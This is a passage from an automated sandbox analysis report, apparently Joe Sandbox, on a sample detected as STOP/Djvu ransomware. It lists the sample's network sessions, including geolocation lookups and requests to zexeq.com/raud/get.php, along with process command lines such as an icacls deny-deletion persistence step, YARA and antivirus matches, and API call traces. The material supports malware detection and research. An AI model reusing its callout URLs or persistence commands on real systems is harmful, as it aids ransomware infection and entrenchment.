                                                                                                      Data Ascii: ty: 0'></div><script>window.park = "eyJ1dWlkIjoiMmQ3NGYwY2QtNGZmMS1jMjczLTMzZjEtZjNmMTEyNmU3OThjIiwicGFnZV90aW1lIjoxNzA3Njk4MTcwLCJwYWdlX3VybCI6Imh0dHA6XC9cL3pleGVxLmNvbVwvcmF1ZFwvZ2V0LnBocD9waWQ9RjhBRkNEQzRFODAwQTMzMTlGRkIzNDNFODMwOTk2MzciLCJ
Feb 12, 2024 01:36:10.084992886 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0
Feb 12, 2024 01:36:15.166464090 CET | 187 | OUT | GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1
                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                      Host: zexeq.com
                                                                                                      Cookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c
Feb 12, 2024 01:36:15.284982920 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Mon, 12 Feb 2024 00:36:15 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: keep-alive
                                                                                                      Set-Cookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c; expires=Mon, 12 Feb 2024 00:51:15 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n75xuvH1ruuh5wuSad1OP5wNm7LsolZxzMWMgrdmCkrjFmGI0KLCAxbuBHnzTOilT/h6ps2rqpBqNktqWhDXuA==
                                                                                                      Cache-Control: no-cache
                                                                                                      Accept-CH: sec-ch-prefers-color-scheme
                                                                                                      Critical-CH: sec-ch-prefers-color-scheme
                                                                                                      Vary: sec-ch-prefers-color-scheme
                                                                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                      Cache-Control: no-store, must-revalidate
                                                                                                      Cache-Control: post-check=0, pre-check=0
                                                                                                      Pragma: no-cache
                                                                                                      Data Ascii: 383<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n75xuvH1ruuh5wuSad1OP5wNm7LsolZxzMWMgrdmCkrjFmGI0KLCAxbuBHnzTOilT/h6ps2rqpBqNktqWhDXuA=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style='opaci
Feb 12, 2024 01:36:15.285053015 CET | 441 | IN
                                                                                                      Data Ascii: ty: 0'></div><script>window.park = "eyJ1dWlkIjoiMmQ3NGYwY2QtNGZmMS1jMjczLTMzZjEtZjNmMTEyNmU3OThjIiwicGFnZV90aW1lIjoxNzA3Njk4MTc1LCJwYWdlX3VybCI6Imh0dHA6XC9cL3pleGVxLmNvbVwvcmF1ZFwvZ2V0LnBocD9waWQ9RjhBRkNEQzRFODAwQTMzMTlGRkIzNDNFODMwOTk2MzciLCJ
Feb 12, 2024 01:36:15.285073996 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49729 | 104.21.65.24 | 443 | 6828 | C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-12 00:35:53 UTC | 85 | OUT | GET /geo.json HTTP/1.1
                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                      Host: api.2ip.ua
2024-02-12 00:35:54 UTC | 895 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Mon, 12 Feb 2024 00:35:54 GMT
                                                                                                      Content-Type: application/json
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      strict-transport-security: max-age=63072000; preload
                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                      x-content-type-options: nosniff
                                                                                                      x-xss-protection: 1; mode=block; report=...
                                                                                                      access-control-allow-origin: *
                                                                                                      access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                      access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PCP69XVCcTY%2FSZppwqlgRQLdfDrjz9BuBTj9f9ejtk5fxxKKXNf5o3UjZ%2BWnaM6tKoXKc%2Fqc1Y6uwkhaFB%2F9zY%2FK7aiady%2F3mRHLwgexzPQaluUQsR2BBbCDhuLS"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8540c1166ed206e2-ATL
                                                                                                      alt-svc: h3=":443"; ma=86400
2024-02-12 00:35:54 UTC | 461 | IN
                                                                                                      Data Ascii: 1c6{"ip":"81.181.57.74","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Georgia","region_rus":"\u0414\u0436\u043e\u0440\u0434\u0436\u0438\u044f","region_ua":"\u0414\
2024-02-12 00:35:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49730 | 104.21.65.24 | 443 | 6956 | C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-12 00:35:55 UTC | 85 | OUT | GET /geo.json HTTP/1.1
                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                      Host: api.2ip.ua
2024-02-12 00:35:55 UTC | 889 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Mon, 12 Feb 2024 00:35:55 GMT
                                                                                                      Content-Type: application/json
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      strict-transport-security: max-age=63072000; preload
                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                      x-content-type-options: nosniff
                                                                                                      x-xss-protection: 1; mode=block; report=...
                                                                                                      access-control-allow-origin: *
                                                                                                      access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                      access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wSXfyqqOTHyH6X5EdZc%2BiBc3o7huV8vyMsFPB4zxkXpp9nTVbbJVTeuE8uJytsobYRfbzQWDoOe4dcQyu%2FHrLtKrI2f%2BqtAxITwlqNsswX0iACWJK9vpIhtDLaXf"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8540c1204ac54588-ATL
                                                                                                      alt-svc: h3=":443"; ma=86400
2024-02-12 00:35:55 UTC | 461 | IN
                                                                                                      Data Ascii: 1c6{"ip":"81.181.57.74","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Georgia","region_rus":"\u0414\u0436\u043e\u0440\u0434\u0436\u0438\u044f","region_ua":"\u0414\
2024-02-12 00:35:55 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49733 | 104.21.65.24 | 443 | 5776 | C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-12 00:35:57 UTC | 85 | OUT | GET /geo.json HTTP/1.1
                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                      Host: api.2ip.ua
2024-02-12 00:35:58 UTC | 893 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Mon, 12 Feb 2024 00:35:57 GMT
                                                                                                      Content-Type: application/json
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      strict-transport-security: max-age=63072000; preload
                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                      x-content-type-options: nosniff
                                                                                                      x-xss-protection: 1; mode=block; report=...
                                                                                                      access-control-allow-origin: *
                                                                                                      access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                      access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3VRe9kU%2BVBw7OuHms7SHMB12TyZOY0iz3x7kei7qVvMLdVxzKd%2BKvt1BPZ4V20ZcM1VPo8Je%2BLH8flIxg7fDJGjjFfVXO%2FBWXobLE0theSTNtS69%2FWLHjleM6Jkh"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8540c12d9e5d4542-ATL
                                                                                                      alt-svc: h3=":443"; ma=86400
2024-02-12 00:35:58 UTC | 461 | IN
                                                                                                      Data Ascii: 1c6{"ip":"81.181.57.74","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Georgia","region_rus":"\u0414\u0436\u043e\u0440\u0434\u0436\u0438\u044f","region_ua":"\u0414\
                                                                                                      2024-02-12 00:35:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      3 | 192.168.2.4 | 49735 | 104.21.65.24 | 443 | 5644 | C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2024-02-12 00:36:10 UTC | 85 | OUT | GET /geo.json HTTP/1.1
                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                      Host: api.2ip.ua
                                                                                                      2024-02-12 00:36:10 UTC | 889 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Mon, 12 Feb 2024 00:36:10 GMT
                                                                                                      Content-Type: application/json
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      strict-transport-security: max-age=63072000; preload
                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                      x-content-type-options: nosniff
                                                                                                      x-xss-protection: 1; mode=block; report=...
                                                                                                      access-control-allow-origin: *
                                                                                                      access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                      access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OJDManXkGzNbIsKVO2LreVujoxcFdqB51da3MalAS5gVcnsxuYmC%2B8Ieui3a%2B7bMUd%2FiUmJVmQw9rG92iM43SZYlGrc6r316W2lpBOOQ8QS6aQxQOSf0iRyCjcdj"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8540c17c2c576753-ATL
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      2024-02-12 00:36:10 UTC | 461 | IN | Data Ascii: 1c6{"ip":"81.181.57.74","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Georgia","region_rus":"\u0414\u0436\u043e\u0440\u0434\u0436\u0438\u044f","region_ua":"\u0414\
                                                                                                      2024-02-12 00:36:10 UTC | 5 | IN | Data Ascii: 0


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      4 | 192.168.2.4 | 49742 | 104.21.65.24 | 443 | 5104 | C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2024-02-12 00:36:16 UTC | 85 | OUT | GET /geo.json HTTP/1.1
                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                      Host: api.2ip.ua
                                                                                                      2024-02-12 00:36:17 UTC | 887 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Mon, 12 Feb 2024 00:36:17 GMT
                                                                                                      Content-Type: application/json
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      strict-transport-security: max-age=63072000; preload
                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                      x-content-type-options: nosniff
                                                                                                      x-xss-protection: 1; mode=block; report=...
                                                                                                      access-control-allow-origin: *
                                                                                                      access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                      access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8rrIyL%2BjGAlZG%2B2DAz2BxpDdWyXwuYyYfTaxA5tiuw85ANLYfiorCUh9LF4KPvGEwrsk4a7fadlI9gkOHW82Ho5z0gPm0ped5p0BPvZ33Z0FkzbMOffjLEaY6Fql"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8540c1a4c9e1b0b5-ATL
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      2024-02-12 00:36:17 UTC | 461 | IN | Data Ascii: 1c6{"ip":"81.181.57.74","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Georgia","region_rus":"\u0414\u0436\u043e\u0440\u0434\u0436\u0438\u044f","region_ua":"\u0414\
                                                                                                      2024-02-12 00:36:17 UTC | 5 | IN | Data Ascii: 0


                                                                                                      Target ID:0
                                                                                                      Start time:01:35:52
                                                                                                      Start date:12/02/2024
                                                                                                      Path:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      Imagebase:0xf10000
                                                                                                      File size:1'150'976 bytes
                                                                                                      MD5 hash:1AAB5A9252E93871932CD7381693E199
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000000.1623898320.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000003.1638345295.0000000003681000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000003.1638345295.0000000003681000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000000.1624016801.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000000.1624016801.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:1
                                                                                                      Start time:01:35:53
                                                                                                      Start date:12/02/2024
                                                                                                      Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:icacls "C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                      Imagebase:0xb00000
                                                                                                      File size:29'696 bytes
                                                                                                      MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      Target ID:2
                                                                                                      Start time:01:35:54
                                                                                                      Start date:12/02/2024
                                                                                                      Path:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                      Imagebase:0xf10000
                                                                                                      File size:1'150'976 bytes
                                                                                                      MD5 hash:1AAB5A9252E93871932CD7381693E199
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000000.1641298642.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000000.1641361042.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000000.1641361042.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:3
                                                                                                      Start time:01:35:56
                                                                                                      Start date:12/02/2024
                                                                                                      Path:C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe --Task
                                                                                                      Imagebase:0xf00000
                                                                                                      File size:1'150'976 bytes
                                                                                                      MD5 hash:1AAB5A9252E93871932CD7381693E199
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000003.00000000.1661537232.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000003.00000000.1661537232.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000003.00000000.1661461662.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Author: Joe Security
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Author: unknown
                                                                                                      • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Author: ditekSHen
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 100%, Avira
                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                      • Detection: 87%, ReversingLabs
                                                                                                      • Detection: 79%, Virustotal, Browse
                                                                                                      Reputation:low
                                                                                                      Has exited:false

                                                                                                      Target ID:4
                                                                                                      Start time:01:36:07
                                                                                                      Start date:12/02/2024
                                                                                                      Path:C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe" --AutoStart
                                                                                                      Imagebase:0xf00000
                                                                                                      File size:1'150'976 bytes
                                                                                                      MD5 hash:1AAB5A9252E93871932CD7381693E199
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000004.00000000.1771858243.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000004.00000000.1771858243.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000004.00000000.1771375510.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000004.00000002.1800921924.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000004.00000002.1800981688.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000004.00000002.1800981688.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:6
                                                                                                      Start time:01:36:15
                                                                                                      Start date:12/02/2024
                                                                                                      Path:C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe" --AutoStart
                                                                                                      Imagebase:0xf00000
                                                                                                      File size:1'150'976 bytes
                                                                                                      MD5 hash:1AAB5A9252E93871932CD7381693E199
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000000.1853038508.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000002.1865701923.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000000.1853102324.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000000.1853102324.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000002.1865795422.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000002.1865795422.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                      Reputation:low
                                                                                                      Has exited:true


                                                                                                        Execution Graph

                                                                                                        Execution Coverage:2.3%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:37.3%
                                                                                                        Total number of Nodes:806
                                                                                                        Total number of Limit Nodes:91
DecodePointer 39460->39462 39468 f37e76 39462->39468 39464 f37f37 __wsopen_helper 39464->38771 39466 f37e83 EncodePointer 39466->39468 39467 f37f1f 39469 f37b0b _malloc 3 API calls 39467->39469 39468->39459 39468->39466 39470 f37e93 DecodePointer EncodePointer 39468->39470 39471 f37f28 39469->39471 39473 f37ea5 DecodePointer DecodePointer 39470->39473 39472 f37f35 39471->39472 39480 f38c81 LeaveCriticalSection 39471->39480 39472->38771 39473->39468 39476 f37f2e 39475->39476 39478 f37f08 39475->39478 39481 f38c81 LeaveCriticalSection 39476->39481 39478->39464 39479 f38c81 LeaveCriticalSection 39478->39479 39479->39467 39480->39472 39481->39478
                                                                                                        APIs
                                                                                                          • Part of subcall function 00F1CF10: _memset.LIBCMT ref: 00F1CF4A
                                                                                                          • Part of subcall function 00F1CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00F1CF5F
                                                                                                          • Part of subcall function 00F1CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00F1CFA6
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00F29FC4
                                                                                                        • GetLastError.KERNEL32 ref: 00F29FD2
                                                                                                        • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00F29FDA
                                                                                                        • GetLastError.KERNEL32 ref: 00F29FE4
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,00C23200,?), ref: 00F2A0BB
                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F2A0C2
                                                                                                        • GetCommandLineW.KERNEL32(?,?), ref: 00F2A161
                                                                                                          • Part of subcall function 00F224E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 00F224FE
                                                                                                          • Part of subcall function 00F224E0: GetLastError.KERNEL32 ref: 00F22509
                                                                                                          • Part of subcall function 00F224E0: CloseHandle.KERNEL32 ref: 00F2251C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
